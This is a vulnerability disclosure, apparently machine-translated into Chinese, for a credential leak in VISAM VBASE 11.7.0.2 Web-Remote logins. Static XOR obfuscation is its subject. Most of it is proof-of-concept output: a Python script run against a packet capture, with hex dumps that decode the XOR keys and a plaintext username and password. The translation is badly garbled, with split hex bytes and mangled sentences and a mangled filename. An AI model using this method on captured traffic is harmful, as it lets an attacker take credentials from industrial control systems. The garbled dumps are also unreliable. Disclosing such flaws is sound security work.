VISAM VBASE v11.7.0.2凭据披露

站得住脚的发现凭证披露漏洞VISAM VBASE 11.7.0.2。当登录VBASE运行时通过Web-Remote项目,该产品使用XOR和静态初始混淆登录信息的关键。未经过身份验证的远程攻击者能够捕获一个登录会话可以获得登录凭证。

python3 vbase_web_remote_credential_disclosure。py - f vbase_web_remote_11.7.0.2_login_success。pcapng - p 8181(——最初的XOR解码关键)00000000:54 3 e 4 c d 44 3 54 30 4 50 36 51 57 3 c 51 3 e T < LMD: T0P6JQW <问> 00000010:56 V(——客户WebSocket载荷)00000000:18 71 0 b 04 0 68 11 61 05 73 19日05。Q…h.a. . .(——客户WebSocket载荷解码)00000000:4 c f 47 49 4 e 52 45 51 55 45 53 54 LOGINREQUEST [——WebSocket服务器负载]00000000:18 71 0 b 04 0 68 11 61 05 73 19日05 73 6 c 62 5 c。q…h.a. . .slb \ 00000010: 66 34 65 04 f 73 65 00 59 6 b 17 15 3 b 31 f4e.s.e.Yk…; 1 [——WebSocket服务器负载解码]00000000:4 c f 47 49 4 e 52 45 51 55 45 53 54 24 50 33 62 LOGINREQUEST P3b 00000010: 30 60 5 b 48 3 e 5 b 5 f 54 69 3 b 21 5 f 6 66 0 [H > [_Ti; !_jf[——新的XOR解码密钥]00000000:33 62 30 60 5 b 48 3 e 5 b 5 f 54 69 3 b 21 5 f 6 P3b0”[H > [_Ti; !_j 00000010: 66 f(——客户WebSocket载荷)00000000:1 c 7 c 25 79 2 e 7 f 29 5 36 36 3 4 d 4 b 40 2 c 19。| % y . .) Z66: MK@。00000010:11 3 f 41 06 01 52 68。一个. .Rh(——客户WebSocket载荷解码)00000000:4 c 4 f 47 49 4 e 24 61 64 6 d 24 70 61 73 73 69 6 e登录管理员通过00000010美元:77 6 f 72 64 31 32 33 word123用户“admin”试图登录密码“password123”!(——WebSocket服务器负载)00000000:1 c 7 c 25 79 2 e 04 07年75 7 f 11 00 20 4 c 6 c 18 2 c。| % y…你…噢。00000010:45 0 d 32 64 0 e 2 d 1 f 0 d 49 16 35 d 1 e 76 4 b .2d.E -…I.5…vK。 00000020: 12 28 14 66 56 7D 34 02 75 .(.fV}4.u [-- server WebSocket payload decoded --] 00000000: 4C 4F 47 49 4E 5F 4F 4B 24 4E 54 49 77 4D 47 46 LOGIN_OK$NTIwMGF 00000010: 6B 62 57 6C 75 4D 44 45 77 4D 6A 49 77 4D 6A 49 kbWluMDEwMjIwMjI 00000020: 78 4E 44 55 34 4D 54 59 3D xNDU4MTY=

• 客户端发送文本的LOGINREQUEST xor初始静态密钥。
• 服务器发送的LOGINREQUEST $ ”;这个消息是xor最初的关键。
• 端解码服务器的LOGINREQUEST消息使用初始密钥,提取新的XOR键。
• 客户端发送的登录美元 美元 “xor新钥匙。
• 服务器解码使用新的XOR关键客户的凭证。